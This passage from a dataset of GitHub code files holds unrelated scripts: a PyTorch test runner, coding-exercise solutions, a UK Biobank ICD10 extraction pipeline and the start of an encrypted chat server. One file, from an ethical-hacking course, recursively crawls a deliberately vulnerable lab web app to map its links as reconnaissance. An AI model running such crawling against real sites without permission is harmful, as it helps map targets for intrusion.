argparse.ArgumentParser(description='PyTorch Template')\n args.add_argument('-c', '--config', default=None, type=str,\n help='config file path (default: None)')\n args.add_argument('-r', '--resume', default=None, type=str,\n help='path to latest checkpoint (default: None)')\n args.add_argument('-d', '--device', default=None, type=str,\n help='indices of GPUs to enable (default: all)')\n args.add_argument('-t', '--output_type', type=str, default='top3_indices', choices=['top3_indices', 'logits'])\n args.add_argument('-o', '--output_dir', default='./submission.csv', type=str,\n help='output_dir')\n\n\n config = ConfigParser.from_args(args, test=True)\n args = args.parse_args()\n\n output_type = args.output_type\n output_dir = args.output_dir\n main(config, output_type, output_dir)\n","repo_name":"AxotZero/esun_consumption_prediction_1st_place_solution","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3522,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"5"} +{"seq_id":"4516438491","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'encryption' function below.\n#\n# The function is expected to return a STRING.\n# The function accepts STRING s as parameter.\n#\n\ndef encryption(s):\n cols = math.ceil(math.sqrt(len(s)))\n grid = [''] * cols\n col = 0\n for i in range(len(s)):\n grid[col] += s[i]\n col += 1\n if col == cols:\n col = 0\n return ' '.join(grid)\n \n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n s = input()\n\n result = encryption(s)\n\n fptr.write(result + '\\n')\n\n fptr.close()\n","repo_name":"ThomasJRooney/practice","sub_path":"hackerrank/algorithms/encryption.py","file_name":"encryption.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"266641988","text":"#!/usr/bin/env python\n\nimport requests\nimport re\nimport urllib.parse as urlparse # if wanting to use python 2 only import urlparse\n\ntarget_url = \"http://10.0.2.5/mutillidae/\"\ntarget_links = []\n\n\ndef extract_links_from(url):\n response = requests.get(url) # submits get request and extracts it\n return re.findall('(?:href=\")(.*?)\"', response.content.decode(errors=\"ignore\")) # regex searches html for a tags and returns it\n\n\ndef crawl(url):\n href_links = extract_links_from(url)\n for link in href_links:\n link = urlparse.urljoin(url, link)\n\n if \"#\" in link:\n link = link.split(\"#\")[0]\n\n if target_url in link and link not in target_links:\n target_links.append(link)\n print(link)\n crawl(link) # calls itself making it a recursive method\n\n\ncrawl(target_url)\n","repo_name":"azkrebs/python_for_ethical_hacking_2021","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"71892566873","text":"from django.test import TestCase\nfrom Hotel_app.models import *\n\nclass TestModels(TestCase):\n\n def testcreate(self):\n self.reservacionprueba = tblreservacion.objects.create(\n \n nombre = 'José',\n apellido = 'Perez',\n\n fecha_llegada = '2023-02-15',\n fecha_salida = '2022-02-20',\n email = 'josseperez@gmail.com',\n\n habitacion = 'Deluxe Double Room'\n\n\n )\n","repo_name":"HaroldSantos10/Web_Hotel","sub_path":"HotelVenv/Hotel_app/test/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70811771671","text":"import time\r\nfrom scheduler import *\r\nfrom task1 import *\r\nfrom task2 import *\r\nfrom task3 import *\r\nfrom task4 import *\r\nfrom task5 import *\r\n\r\nscheduler = Scheduler()\r\nscheduler.SCH_Init()\r\n\r\ntask_Ready = [False, False, False, False]\r\ntask_Data = [\"\", \"\", \"\", \"\"]\r\n\r\ncamera = Camera()\r\n\r\ntask1 = StudentCardDetector(0, task_Ready, task_Data, camera)\r\ntask2 = FaceRecognizer(1, task_Ready, task_Data, camera)\r\ntask3 = StudentIDChecker(2, task_Ready, task_Data)\r\ntask4 = BusRecorder(3, task_Ready, task_Data)\r\ntask5 = AdafruitServer(latest_output)\r\n\r\nscheduler.SCH_Add_Task(task5.Run, 1000,500)\r\nscheduler.SCH_Add_Task(task1.RunTask, 1000,5000)\r\nscheduler.SCH_Add_Task(task2.RunTask, 2000,1000)\r\nscheduler.SCH_Add_Task(task3.RunTask, 3000,1000)\r\nscheduler.SCH_Add_Task(task4.RunTask, 4000,1000)\r\n\r\n# Run the first task\r\ntask_Ready[0] = True\r\n\r\nwhile True:\r\n scheduler.SCH_Update()\r\n scheduler.SCH_Dispatch_Tasks()\r\n time.sleep(0.1)\r\n","repo_name":"xiinthanh/IntroToCS_Project_","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28965980296","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 10 15:17:40 2015\n\n@author: ZSHU\n\"\"\"\n\n'''\ntypical recursive algorithm\n'''\n\n\nclass Solution(object):\n def combine(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: List[List[int]]\n \"\"\"\n \n def combine(length, vector, temp, res):\n if len(temp)==length:\n res.append(temp)\n return \n elif len(vector)==0:\n return \n else:\n for i in range(len(vector)):\n combine(length, vector[i+1:], temp+[vector[i]], res)\n \n res=[]; vector=range(1, n+1)\n combine(k, vector, [], res )\n return res \n\n ","repo_name":"shuzhancnjx/leetcode-","sub_path":"Programming-Algorithm/Combinations.py","file_name":"Combinations.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28114684156","text":"#FIRESTORE Cloud data being sent through flask server to LocalHost! \n##Using Query 'GET'\n\nimport os\n\nfrom firebase_admin import credentials, firestore, initialize_app\n\nfrom flask import Flask, request, jsonify\napp = Flask(__name__)\n\ncred = credentials.Certificate('serviceAccountKey.json')\n\ndefault_app = initialize_app(cred)\n\ndb = firestore.client()\n\ndatabase_ref = db.collection('entities')\n\n@app.route('/', methods=['GET'])\n\ndef read():\n\n try:\n pm25 = request.args.get('pm25')\n dt = request.args.get('DateTime')\n if pm25 and dt:\n pm25_data = database_ref.document(pm25)\n dt_data = database_ref.document(dt)\n \n return jsonify({'DateTime': dt_data, 'PM2.5': pm25_data}), 200\n else:\n\n all_todos = [doc.to_dict() for doc in database_ref.stream()]\n\n return jsonify(all_todos), 200\n \n \n except Exception as e:\n\n return f\"An Error Occured: {e}\"\n\nif __name__ == '__main__':\n\n app.run(port = 4010, debug = True)\n","repo_name":"Shaxpy/Firebase-and-Cloud","sub_path":"Flask/Flask Server hosting Cloud.py","file_name":"Flask Server hosting Cloud.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"22144759181","text":"#12Spanishword\r\n#Write a function 'createDictionary' that creates 'spanish' dicitonary by assigning spanish equivalent of 1 to 10 like spnaish['one']='uno'. Now print values on the screen. (Mandatory)\r\n\r\ndef createDictionary(dict1):\r\n while True:\r\n spanish=input('Enter Spanish Number that you want to add in Dictionary: ')\r\n if spanish in ['exit','Exit','EXIT']:\r\n break\r\n else:\r\n english=input('ENTER english OF {}: '.format(spanish))\r\n dict1[spanish]=english\r\n\r\n\r\ndicti={}\r\ncreateDictionary(dicti)\r\nprint(dicti)","repo_name":"LutiM30/My-Python-Work","sub_path":"dict13.py","file_name":"dict13.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20128458925","text":"def power(a,b):\r\n\tif b==0:\r\n\t\treturn 1\r\n\telif a==0:\r\n\t\treturn 0\r\n\telif b==1:\r\n\t\treturn a\r\n\telse:\r\n\t\treturn a*power(a,b-1)\r\n\t\t\r\n# \t\t3*power(3,3)\r\n# \t\t3*3*power(3,2)\r\n# 3*3*3*power(3,1)\r\n# if 1 return a\r\n# 3*3*3*3*power(3,0)\r\n# if 0 return 1\r\n# 3*3*3*3*1\r\n \r\nprint(power(3,4))\r\n","repo_name":"suprajaarthi/DSA","sub_path":"16 Day6 ExponentRec.py","file_name":"16 Day6 ExponentRec.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4188589449","text":"continua = str()\nlista = []\nwhile continua != 'n':\n try:\n lista += [int(input('Digite um número inteiro: '))]\n except ValueError:\n print('Digite apenas números inteiros!')\n continue\n while True:\n continua = str(input('Deseja continuar? (S/N): ')).lower()\n if continua not in 'sn':\n print('Digite uma Opção Válida!')\n continue\n else:\n break\nprint(f'Você digitou os números:', end=' ')\nprint(str(lista)[1:-1])\nprint(f'Os números pares que você digitou foram:', end=' ')\nprint(str(list(filter(lambda x: x % 2 == 0, lista)))[1:-1])\nprint(f'Os números ímpares que você digitou foram:', end=' ')\nprint(str(list(filter(lambda x: x % 2 == 1, lista)))[1:-1])\n","repo_name":"JamesIslan/exercicios-python","sub_path":"curso-em-video-python/82.py","file_name":"82.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"8412220229","text":"# set the number of channels to be more than 2\nfrom struct import pack\nfrom math import pi, sin\nimport wave\nfs = 16000\nwf = wave.open('3channels.wav','w')\n#3 channels\nwf.setnchannels(3)\n#32 bits per sample - 4 bytes\nwf.setsampwidth(4)\n#sampling frequency I choosed is 16000Hz\nwf.setframerate(fs)\n#32 bits - 0~1\nmaxAmp = 2**31 - 1.0\nf1 = 200\nf2 = 400\nf3 = 800\nfor n in range(0, int(0.5*fs)):\n#'B'-unsigned 8-bit wav and it standard size is 1\n#first channel\n\tbinary_string = pack('i', maxAmp*sin(n*2*pi*f1/fs))\n#second channel\n\tbinary_string += pack('i', maxAmp*sin(n*2*pi*f2/fs))\n#third channel\n\tbinary_string += pack('i', maxAmp*sin(n*2*pi*f3/fs))\n\twf.writeframesraw(binary_string)\nwf.close()","repo_name":"Raisony/Dsp-lab","sub_path":"lecture_01_exercises/8/3channels.py","file_name":"3channels.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"618706493","text":"import sys\ninput = sys.stdin.readline\nINF = int(1e9)\n\n\ndef bellman_ford():\n global check\n distance = [INF] * (n+1)\n for a in range(1, n+1):\n for b in range(1, n+1):\n for node, dist in edges[b]:\n cost = distance[b] + dist\n if cost < distance[node]:\n distance[node] = cost\n if a == n:\n check = False\n return\n\n\nt = int(input())\n\nanswers = []\nfor _ in range(t):\n n, m, w = map(int, input().split())\n edges = [[] for _ in range(n+1)]\n\n for _ in range(m):\n s, e, t = map(int, input().split())\n edges[s].append([e, t])\n edges[e].append([s, t])\n\n for _ in range(w):\n s, e, t = map(int, input().split())\n edges[s].append([e, -t])\n\n print(edges)\n check = True\n bellman_ford()\n\n if check:\n answers.append(\"NO\")\n else:\n answers.append(\"YES\")\n\nfor answer in answers:\n print(answer)","repo_name":"Chockchockhancookie/Algorithm","sub_path":"꼭 다시 풀어볼 문제/1865.py","file_name":"1865.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"12527648538","text":"# bank account - kind of account - methods - return new balance\n\n# Write a BankAccount class.\n# Bank accounts should be created with the kind of account (like \"savings\" or \"checking\").\n # Each account should keep track of its current balance.\n # Each account should have access to a deposit and a withdraw method.\n# Each account should start with a balance set to zero.\n# return the amount withdrawn, for convenience\n\nclass BankAccount():\n def __init__(self, kind, pin):\n self.kind = kind\n self.balance = 0\n self.fees = 0\n self.pin = pin\n\n def deposit(self, amount):\n self.balance += amount\n\n def withdraw(self, amount, pin_from_user):\n\n if (self.pin == pin_from_user):\n\n if (self.balance < amount):\n print(\"sorry yr too broke\")\n return\n elif (self.balance == amount):\n self.balance -= amount\n print(f\"yr at zero, be careful\")\n else:\n self.balance -= amount\n print(f\"current balance is {self.balance}\")\n else:\n print(\"the pin you have entered is incorrect\")\n\n def change_pin(self, pin):\n self.pin = pin\n print(f\"your new pin is {self.pin}\")\n\n\n\n\nhan_bank = BankAccount(\"checking\", 69)\nprint(\"my new account is a {} account\".format(han_bank.kind))\n\nhan_bank.deposit(69000)\nprint(\"my current balance is ${}\".format(han_bank.balance))\n\nhan_bank.withdraw(690000, 698)\nprint(\"my current balance is ${}\".format(han_bank.balance))\n\nhan_bank.change_pin(6978)\n\n","repo_name":"iwasnevergivenaname/intro_to_py","sub_path":"bank_account.py","file_name":"bank_account.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36040376516","text":"import os\nimport errno\nimport numpy as np \nimport pandas as pd\nimport bs4 as bs\nfrom urllib.request import urlopen\nimport unicodedata\nfrom collections import OrderedDict\nimport argparse\n# ===================================================================================================================================\n# RAW DATA FILES\ninput_tab_file = '/path/to/ukb.tab'\nhesin='/path/to/hesin.txt'\nhesin_diag='/path/to/hesin_diag.txt'\ncoding_19_file='/path/to/coding19.tsv'\nexclusion_threshold = 50 # Skip categorical feature if has more than \"exclusion_threshold\" categories\n# ===================================================================================================================================\n\n# CREATE OUTPUT DIRECTORY\noutput_dir = 'Output'\ntry:\n os.makedirs(output_dir)\nexcept OSError as e:\n if e.errno != errno.EEXIST:\n raise\n# ===================================================================================================================================\n# SCRAPE UK BIOBANK SHOWCASE TO GET DATA-TYPE FOR EACH FIELD-ID\nprint('Scraping showcase webpage...')\nsauce = urlopen('http://biobank.ctsu.ox.ac.uk/crystal/list.cgi').read()\nsoup = bs.BeautifulSoup(sauce, 'lxml')\n\nfield_listing = ['Integer',\n 'Categorical (single)',\n 'Categorical (multiple)',\n 'Continuous',\n 'Text',\n 'Date',\n 'Time',\n 'Compound']\n\ndf_descriptions = []\n\nfor url in soup.find_all('a'):\n if url.text in field_listing:\n df_type = url.text\n link = 'http://biobank.ctsu.ox.ac.uk/crystal/' + url.get('href')\n sauce_loop = urlopen(link).read()\n soup_loop = bs.BeautifulSoup(sauce_loop, 'lxml')\n raw_text = unicodedata.normalize(\"NFKD\", soup_loop.get_text('\\t'))\n lines = raw_text.split('\\n')\n for line in lines:\n splt = [s for s in line.split('\\t')[1:] if s != ''\n and s != ' '\n and s!= ' '\n and s!= u'\\u2020']\n #u'\\u2020' is the dagger from Compound\n if len(splt) == 3 and splt[0].isdigit():\n splt.append(df_type)\n df_descriptions.append('%s\\t%s\\t%s\\t%s'%(splt[0],\n splt[1],\n splt[2],\n splt[3]))\n\nwith open('ukbdatafields.webscraped.tsv', 'w') as outfile:\n outfile.write('%s\\n'%('\\t'.join(['FieldID', 'Description', 'Category', 'ValueType'])))\n for f in df_descriptions:\n outfile.write('%s\\n'%f)\n\n# ===================================================================================================================================\n# CREATE A LIST OF FIELD ID'S FOR EACH DATA-TYPE\nprint('Creating a list of field-ids for each data-type...')\ndata_types = ['Categorical_multiple', 'Categorical_single', 'Continuous', 'Integer']\nfor t in data_types:\n outfile = open('%s/%s.datafields'%(output_dir, t), 'w')\n with open('%s/ukbdatafields.webscraped.tsv'%output_dir, 'r') as infile:\n for line in infile:\n fid, name, category, vartype = line.rstrip().split('\\t')\n # Vartype: replace brackets with an underscore\n if vartype.replace(' (', '_').replace(')','') == t:\n outfile.write('%s\\n'%fid)\n outfile.close()\n\n# ===================================================================================================================================\n# SPLIT TAB_FILE BY VALUE TYPE\nprint('Splitting .tab file by variable type...')\nfieldID_lists = [f for f in os.listdir(output_dir) if '.datafields' in f]\nfor fidlist in fieldID_lists:\n outprefix = fidlist.split('.')[0]\n #print('%s...'%(outprefix))\n\n tabfile = input_tab_file\n # GET COLUMN HEADER\n with open(tabfile, 'r') as infile:\n header = next(infile).split('\\t')\n\n def getCols(datafields):\n cols = []\n for df in datafields:\n # Look into why you only include first visit.\n # Extract features for all visits, but make sure this doesn't break anything. \n cols += [i for i,h in enumerate(header) if 'f.%s.0.'%df in h]\n return cols\n\n # UKB data-fields to search for\n with open('%s/%s'%(output_dir, fidlist), 'r') as infile:\n datafields = [line.rstrip() for line in infile]\n\n cols = getCols(datafields)\n\n with open(tabfile, 'r') as infile:\n outfile = open('%s/%s.phenoslice.csv'%(output_dir, outprefix), 'w')\n for line in infile:\n data = line.rstrip().split('\\t')\n output = [data[0]] + [data[col] for col in cols]\n outfile.write('%s\\n'%(','.join(output)))\n outfile.close()\n\n# ===================================================================================================================================\n# ENUMERATE POSSIBLE CATEGORIES FOR EACH FIELD ID OF TYPE 'CATEGORICAL'\nprint('Enumerating possible categories for each categorical-type column...')\nphenoslices = ['Categorical_multiple.phenoslice.csv', 'Categorical_single.phenoslice.csv']\n\nfor phenoslice in phenoslices:\n outname = '%s.possiblecategories.txt'%phenoslice.split('.')[0]\n categories={}\n with open('%s/%s'%(output_dir, phenoslice), 'r') as infile:\n header = next(infile).rstrip().split(',')[1:]\n for f in header:\n categories[f.split('.')[1]] = set()\n for ln, line in enumerate(infile):\n #print(phenoslice, ln)\n splt, headersubset = [],[]\n for idx, i in enumerate(line.rstrip().split(',')[1:]):\n if i != 'NA':\n splt.append(i.replace('\"',''))\n headersubset.append(header[idx])\n for i,value in enumerate(splt):\n datafield = headersubset[i].split('.')[1]\n categories[datafield].add(value)\n\n outfile = open('%s/%s'%(output_dir, outname), 'w')\n for i in sorted(categories):\n # Don't use spaces. There are some categories that have spaces. Ex, field 5090.\n outfile.write('%s\\t%s\\n'%(i, '\\t'.join(sorted(categories[i]))))\n outfile.close()\n\n# ===================================================================================================================================\n# MAKE CATEGORICAL FEATURE MATRIX\nprint('Building categorical feature matrix...')\n# NOTE: If any data-field has more than 'exclusion_threshold' number of possible categories, exclude it. \n# This will exclude data-fields like ICD9/10 codes and drug usage.\n\nfor categoricaltype in ['multiple', 'single']:\n f = 'Categorical_%s.possiblecategories.txt'%categoricaltype\n\n # Make a feature to index mapping \n features = []\n with open('%s/%s'%(output_dir, f), 'r') as infile:\n for line in infile:\n splt = line.rstrip().split('\\t')\n features+=['%s.%s'%(splt[0], s) for s in splt[1:]+['NA'] if len(splt) < exclusion_threshold]\n\n FieldDotCategoryToIndex = {x:i for i,x in enumerate(features)}\n # Define phenoslice\n phenoslice = '%s/Categorical_%s.phenoslice.csv'%(output_dir, categoricaltype)\n\n # Get number of individuals\n with open(phenoslice, 'r') as infile:\n n_individuals = len([i for i, line in enumerate(infile)])-1 # -1 excludes header\n\n # Initialize matrix\n M = np.zeros((n_individuals, len(features)))\n\n # Populate matrix\n with open(phenoslice, 'r') as infile:\n header = next(infile).rstrip().split(',')\n eids = []\n for rowidx,line in enumerate(infile):\n splt = line.rstrip().split(',')\n eid = splt[0]\n eids.append(eid)\n for h, category in zip(header[1:], splt[1:]):\n datafield = h.split('.')[1]\n # Create string made of current column+value seen at this individual/column\n FieldDotCategory = '%s.%s'%(datafield, category.replace('\"',''))\n if FieldDotCategory in FieldDotCategoryToIndex:\n colidx = FieldDotCategoryToIndex[FieldDotCategory]\n M[rowidx, colidx] = 1\n\n # Output to file\n outname='%s.onehot.csv'%f.split('.')[0]\n with open('%s/%s'%(output_dir, outname), 'w') as outfile:\n header=','.join(['eid']+['c.%s'%f for f in features])\n outfile.write('%s\\n'%header)\n for eid, row in zip(eids, M):\n outfile.write('%s,%s\\n'%(eid,','.join([str(int(r)) for r in row])))\n\n# ===================================================================================================================================\n# MAKE INTEGER AND CONTINUOUS MATRICES\nprint('Building integer and continuous matrices...')\nfor phenoslice in ['%s/Integer.phenoslice.csv'%output_dir,\n '%s/Continuous.phenoslice.csv'%output_dir]:\n\n prefix = os.path.basename(phenoslice).split('.')[0]\n\n with open(phenoslice, 'r') as infile:\n header = next(infile).rstrip().split(',')\n\n # Find all datafields that have more than one instance\n multiple = set()\n for h in header[1:]:\n df, nvisit, instance = h.split('.')[1:]\n if int(instance) > 0:\n multiple.add(df)\n\n # Get idx-list for multiple and single datafields\n single_idxs, multiple_idxs = [], []\n for i,h in enumerate(header[1:], start=1): # skip eid \n df, nvisit, instance = h.split('.')[1:]\n if df in multiple:\n multiple_idxs.append(i)\n else:\n single_idxs.append(i)\n\n # Get number of individuals\n with open(phenoslice, 'r') as infile:\n n_individuals = len([i for i, line in enumerate(infile)])-1 # -1 excludes header\n\n # Write data to files\n f_single = open('%s/%s_single.csv'%(output_dir, prefix), 'w')\n f_multiple = open('%s/%s_multiple.csv'%(output_dir, prefix),'w')\n\n with open(phenoslice, 'r') as infile:\n header = next(infile).rstrip().split(',')\n f_single.write('%s\\n'%(','.join([header[i] for i in [0] + single_idxs])))\n f_multiple.write('%s\\n'%(','.join([header[i] for i in [0] + multiple_idxs])))\n\n for rowidx, line in enumerate(infile):\n data = line.rstrip().split(',')\n eid = data[0]\n\n if phenoslice == '%s/Integer.csv'%output_dir:\n # Did this to account for '-3: Prefer not to answer' type fields. \n # Just set them to NA instead. This has not been tested yet. \n\n dfs_single = [data[i] if '-' not in data[i] \\\n else 'NA' for i in single_idxs]\n\n dfs_multiple = [data[i] if '-' not in data[i] \\\n else 'NA' for i in multiple_idxs]\n else:\n dfs_single = [data[i] for i in single_idxs]\n dfs_multiple = [data[i] for i in multiple_idxs]\n\n\n f_single.write('%s,%s\\n'%(eid,','.join(dfs_single)))\n f_multiple.write('%s,%s\\n'%(eid,','.join(dfs_multiple)))\n\n # Close files\n f_single.close()\n f_multiple.close()\n\n# ===================================================================================================================================\n# EXTRACT ICD10 CODES\nprint('Merging hesin.txt and hesin_diag.txt tables...')\n\n# eid and ins_index together form a primary key\nhesin = pd.read_csv(hesin, sep='\\t', index_col=[0,1])\n# eid, ins_index and arr_index together form a primary key\nhesin_diag = pd.read_csv(hesin_diag, sep='\\t', index_col=[0,1,2])\n# write a new table, where icd10 diagnoses have dates\ndf = hesin_diag.merge(hesin, how='left', on=['eid','ins_index'])\n# Write merged hesin file to disk\ndf.to_csv('%s/hesin_merged_hesin_diag.tsv'%output_dir, sep='\\t', na_rep='NA')\n\n# In case you want to use ICD10 diagnoses that occur before baseline\nbaseline_visit_fieldID = 'f.53.0.0'\nwith open(input_tab_file, 'r') as infile:\n baseline_visit_col = next(infile).rstrip().split('\\t').index(baseline_visit_fieldID)\n\neids = [] \nbaseline_visit_date = {}\nwith open(input_tab_file, 'r') as infile:\n next(infile)\n for line in infile:\n line = line.rstrip().split('\\t', baseline_visit_col+1)\n eid = int(line[0])\n eids.append(eid)\n date = line[-2]\n baseline_visit_date[eid] = date\n\n# Turn the multindex back into columns\ndf.reset_index(inplace=True) \n\n# Create new column 'baseline_date' in Hesin dataframe\ndf['baseline_visit_date'] = [baseline_visit_date[eid] for eid in df['eid']]\n\n# Only include ICD10 codes that were diagnosed prior to baseline UKB visit. \n# To Include ICD10 codes that were diagnosed at any time, comment lines below\n#df = df[df['admidate'] < df['baseline_visit_date']]\n#df['baseline_date'] = [baseline_visit_date[eid] for eid in df['eid']]\n#df = df[df['admidate'] < df['baseline_date']]\n\n# --------- ICD10 LEVEL 1 --------------\nprint('Building ICD10 level 1 matrix...')\n# Make a list of diagnoses for each individual\ndiagnoses = OrderedDict()\nfor eid in eids:\n diagnoses[eid] = []\nfor row in df.itertuples():\n diagnoses[row.eid].append(row.diag_icd10)\n\ncode2category = OrderedDict()\nwith open (coding_19_file, 'r') as infile:\n for line in infile:\n data = line.rstrip().split('\\t')\n if 'Block' in data[0] or 'block' in data[0]:\n code_range = data[0].split(' ')[1]\n # Have to code these manually, bug on UKB website.\n # Ranges at ICD10 level 1 do not cover all possible codes contained at level 2. \n # So I just manually change\n if code_range == 'M20-M25':\n code_range = 'M20-M36'\n if code_range == 'A80-A89':\n code_range = 'A80-A91'\n if code_range == 'U00-U49':\n code_range = 'U00-U81'\n if code_range == 'U82-U85':\n code_range = 'U82-U89'\n\n letter = code_range[0] # letter in front of digits\n lower, upper = code_range[1:3], code_range[5:7]\n codelist = ['%s%0.2d'%(letter,i) for i in range(int(lower), int(upper)+1)]\n for code in codelist:\n code2category[code] = code_range\n\n# I do this stuff to maintain order of categories from ordered Dict. \nlookup = set()\ncategories = [v for k,v in code2category.items()\\\n if v not in lookup and lookup.add(v) is None]\n\n# Given a category, what is the index? \ncategory2index = {cat:i for i, cat in enumerate(categories)}\n\n# output to file\noutfile = open('%s/icd10level1.csv'%output_dir, 'w')\noutfile.write('%s\\n'%','.join(['eid']+categories))\nfor eid in diagnoses:\n codes = [i.replace('\"', '')[:3] for i in diagnoses[eid] if i==i]\n one_hot = [0]*len(categories)\n for code in codes:\n category = code2category[code]\n index = category2index[category]\n one_hot[index] = 1\n outfile.write('%s\\n'%','.join([str(eid)]+[str(o) for o in one_hot]))\noutfile.close()\n\n# --------- ICD10 LEVEL 2 --------------\nprint('Building ICD10 level 2 matrix...')\n# Make a list of diagnoses for each individual\ndiagnoses = OrderedDict()\nfor eid in eids:\n diagnoses[eid] = []\nfor row in df.itertuples():\n diagnoses[row.eid].append(row.diag_icd10)\n\ncategories = []\nwith open(coding_19_file, 'r') as infile:\n for line in infile:\n data = line.rstrip().split('\\t')\n code = data[0]\n if len(code) == 3:\n categories.append(code)\n\n# Given a category, what is the index?\ncategory2index = {cat:i for i, cat in enumerate(categories)}\n\n# output to file\noutfile = open('%s/icd10level2.csv'%output_dir, 'w')\noutfile.write('%s\\n'%','.join(['eid']+categories))\n\nfor e, eid in enumerate(diagnoses):\n #print(e)\n codes = [i.replace('\"', '')[:3] for i in diagnoses[eid] if i==i]\n one_hot = [0]*len(categories)\n for code in codes:\n category = code\n index = category2index[category]\n one_hot[index] = 1\n outfile.write('%s\\n'%','.join([str(eid)]+[str(o) for o in one_hot]))\n\n# ===================================================================================================================================\n# MERGE ALL FEATURES INTO A SINGLE MATRIX\nprint('Merging features into a single file...')\nto_merge = [output_dir+'/%s'%f for f in ['Continuous_single.csv',\n 'Continuous_multiple.csv',\n 'Integer_single.csv',\n 'Integer_multiple.csv',\n 'Categorical_single.onehot.csv',\n 'Categorical_multiple.onehot.csv', \n 'icd10level2.csv',\n 'icd10level1.csv']]\n\noutfile = open(output_dir+'/features_merged.csv', 'w')\n\nfirst_file = to_merge[0]\nother_files = [open(f, 'r') for f in to_merge[1:]]\n\nwith open(first_file, 'r') as infile:\n for line in infile:\n out_line = line.rstrip()\n for f in other_files:\n out_line+=(','+next(f).rstrip().split(',',1)[1])\n outfile.write('%s\\n'%out_line)\n\nfor f in other_files+[outfile]:\n f.close()\n","repo_name":"julyankb/ukb-extract","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":17174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3238629403","text":"from django.db.models.query_utils import Q\n\nfrom initat.cluster.backbone.models.user import virtual_desktop_user_setting\nfrom initat.cluster_server.capabilities.virtual_desktop import virtual_desktop_server\nfrom initat.cluster_server.modules import cs_base_class\n\n\nclass reload_virtual_desktop(cs_base_class.icswCSServerCom):\n def _call(self, cur_inst):\n '''\n :param icswCSComInstance cur_inst:\n '''\n vdus_pk = cur_inst.srv_com[\"*vdus\"]\n cur_inst.log(\"updating virtual desktop {}\".format(vdus_pk))\n vdus = virtual_desktop_user_setting.objects.get(Q(pk=vdus_pk))\n\n control = virtual_desktop_server.get_instance_for_vdus(vdus, cur_inst.log)\n control.stop()\n\n if not vdus.to_delete and vdus.is_running:\n # don't delete, just restart\n control.start()\n vdus.update_state(virtual_desktop_user_setting.State.STARTING)\n else:\n # don't start anymore, either disabled or delete\n vdus.update_state(virtual_desktop_user_setting.State.DISABLED)\n\n if vdus.to_delete:\n cur_inst.log(\"removing virtual desktop {}\".format(vdus_pk))\n vdus.delete()\n","repo_name":"walong365/icsw","sub_path":"initat/cluster_server/modules/virtual_desktop_mod.py","file_name":"virtual_desktop_mod.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6070284703","text":"#\n# @lc app=leetcode id=482 lang=python3\n#\n# [482] License Key Formatting\n#\n\n# @lc code=start\nclass Solution:\n def licenseKeyFormatting(self, S: str, K: int) -> str:\n ans = []\n k = 0\n for s in reversed(S):\n if s == '-':\n continue\n s = s.upper()\n if k == K:\n ans.append('-')\n k = 0\n k += 1\n ans.append(s)\n return ''.join(ans[::-1])\n\n# @lc code=end\n","repo_name":"mingaki/leetcode","sub_path":"482.license-key-formatting.py","file_name":"482.license-key-formatting.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"17525098353","text":"\"\"\"\r\nServidor.\r\n\r\nServidor de un chat. Es una implementación incompleta:\r\n- Falta manejo de exclusión mutua\r\n- Falta poder desconectar de forma limpia clientes\r\n- Falta poder identificar clientes\r\n\"\"\"\r\n\r\n\r\n\r\nimport threading\r\nimport sys \r\nimport socket\r\nimport os\r\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\r\nfrom cryptography.hazmat.primitives.asymmetric import rsa\r\nfrom cryptography.hazmat.primitives.asymmetric import padding\r\nfrom cryptography.hazmat.primitives import hashes, hmac\r\nfrom cryptography.hazmat.backends import default_backend\r\n\r\nimport mensajes\r\nimport llaves\r\n\r\ndef descifrar_llaves(text, llave_publica_receptor):\r\n deciphertext1 = llave_publica_receptor.decrypt(text,\r\n padding.OAEP(\r\n mgf = padding.MGF1(algorithm = hashes.SHA256()),\r\n algorithm = hashes.SHA256(),\r\n label = None))\r\n return 